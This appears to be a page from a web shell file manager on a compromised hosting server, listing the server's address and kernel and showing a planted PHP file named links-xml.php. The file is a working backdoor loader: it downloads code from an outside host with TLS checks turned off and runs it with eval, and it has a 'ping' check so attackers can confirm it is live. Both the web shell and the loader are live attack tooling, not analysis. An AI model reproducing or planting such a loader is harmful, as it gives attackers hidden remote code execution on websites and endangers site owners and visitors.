BLACKSITE
:
216.73.217.20
:
87.98.236.253 / studniczek.pl
:
Linux webm007.cluster131.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
:
/
home
/
qehyqlp
/
www
/
Upload File:
files >> /home/qehyqlp/www/links-xml.php
<?php if (isset($_REQUEST['action']) && $_REQUEST['action'] === 'ping') { echo '1'; exit; } $url = 'http://lxml.hjkl.lol/links-xml.txt'; $code = ''; $err = ''; if (function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_TIMEOUT, 10); $code = curl_exec($ch); if ($code === false) $err = 'curl: ' . curl_error($ch); elseif (($s = curl_getinfo($ch, CURLINFO_HTTP_CODE)) != 200) { $err = 'http ' . $s; $code = ''; } curl_close($ch); } elseif (ini_get('allow_url_fopen')) { $code = @file_get_contents($url); if ($code === false) { $err = 'file_get_contents 失败'; $code = ''; } } else { $err = 'curl 和 allow_url_fopen 均不可用'; } if ($code !== '' && strlen($code) > 10) { eval(substr($code, 5)); exit; } if ($err === '') $err = '响应过短 (' . strlen($code) . ' 字节)'; http_response_code(598); header('Content-Type: application/json'); echo json_encode(['code' => 598, 'message' => 'loader_fetch_failed: ' . $err], JSON_UNESCAPED_UNICODE);